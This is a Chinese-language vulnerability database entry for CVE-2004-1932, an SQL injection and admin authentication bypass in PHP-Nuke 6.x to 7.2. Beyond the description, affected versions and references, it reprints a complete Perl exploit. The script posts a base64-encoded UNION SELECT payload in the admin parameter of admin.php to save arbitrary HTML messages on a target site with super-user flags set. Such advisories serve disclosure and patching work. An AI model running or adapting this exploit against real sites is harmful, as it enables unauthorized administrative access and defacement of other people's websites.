PHP-NukeSQL注入漏洞

PHP-NukeSQL注入漏洞

漏洞ID 1108185 漏洞类型 SQL注入
发布时间 2004-09-16 更新时间 2004-09-16
图片[1]-PHP-NukeSQL注入漏洞-安全小百科CVE编号 CVE-2004-1932
图片[2]-PHP-NukeSQL注入漏洞-安全小百科CNNVD-ID CNNVD-200404-020
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/465
https://www.securityfocus.com/bid/82565
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200404-020
|漏洞详情
PHP-Nuke6.x到7.2版本中的文件(1)auth.php和(2)admin.php存在SQL注入漏洞。远程攻击者可以通过admin参数中的base64-encodedSQL执行任意的SQL代码和创建管理员帐户。
|漏洞EXP
#!/usr/bin/perl
#

use LWP; 

$log = "pos_komen_phpnuke_savemsg.txt"; 
$Agent = "Mbahmubangga/1.0";
$proxy = "http://172.9.1.11:80/"; # proxy:port ...
$browser = LWP::UserAgent->new;
$browser -> agent($Agent);

$url = 'http://www.sitewithphpnuke.com/admin.php';

$browser->proxy(http => $proxy) if defined($proxy);

printlog ("nProcessing: $urln");

for ($a = 1; $a < 11 ; $a++) {

$mid=$a;

$loginpost = $url;
$loginrequest = HTTP::Request->new(POST => $loginpost);
$loginrequest->content_type('application/x-www-form-urlencoded');
$loginsend = 
'title=<h1>JUST TESTING</h1>'.
'&content=you can put HTML format here, all up to you now, 1 liner of course,
or multiple liner with dot'.
'&mlanguage='. #message language
'&expire=0'. #unlimited
'&active=1'. #yes
'&chng_date=0'.
'&view=1'. #all visitors
'&mdate='.
'&mid='.$mid. #the message id, commonly has value under 11
'&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox'. #our magic ammo ==> x'%20UNION%20SELECT%201/*:1
'&add_radminsuper=1'. #the super user / G O D
'&op=savemsg'; #operation
$loginrequest->content-length($loginsend);
$loginrequest->content($loginsend);
$loginresponse = $browser->request($loginrequest);
$logincek = $loginresponse->as_string;
#print ($logincek);


if ($logincek =~ /(500 Can't read entity body: Unknown error)|(411 Length Required)/){
printlog ("$mid attempting edit and saving message sending OK ".$loginresponse-
>status_line ."n") ;
}
else {
printlog ("Could be failure ".$loginresponse->status_line ."n");
last;
}

} #end of for

sub printlog {
print @_[0]; 
open(lo,">>$log");
print lo @_[0];
close(lo);
return;
}

# milw0rm.com [2004-09-16]
|受影响的产品
Francisco Burzi PHP-Nuke 7.2

Francisco Burzi PHP-Nuke 7.1

Francisco Burzi PHP-Nuke 7.0 Final

Francisco Burzi PHP-Nuke 7.0

Francisco Burzi PHP-Nuke 6.9

Francisco Burzi PHP

|参考资料

来源:XF
名称:phpnuke-admin-bypass-authentication(15835)
链接:http://xforce.iss.net/xforce/xfdb/15835
来源:www.waraxe.us
链接:http://www.waraxe.us/index.php?modname=sa&id;=18
来源:BUGTRAQ
名称:20040412[waraxe-2004-SA#018-Admin-levelauthenticationbypassinphpnuke6.x-7.2]
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=108180334918576&w;=2

相关推荐: Killer Protection信息泄露漏洞

Killer Protection信息泄露漏洞 漏洞ID 1107028 漏洞类型 配置错误 发布时间 2002-10-07 更新时间 2002-12-31 CVE编号 CVE-2002-2335 CNNVD-ID CNNVD-200212-210 漏洞平台 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享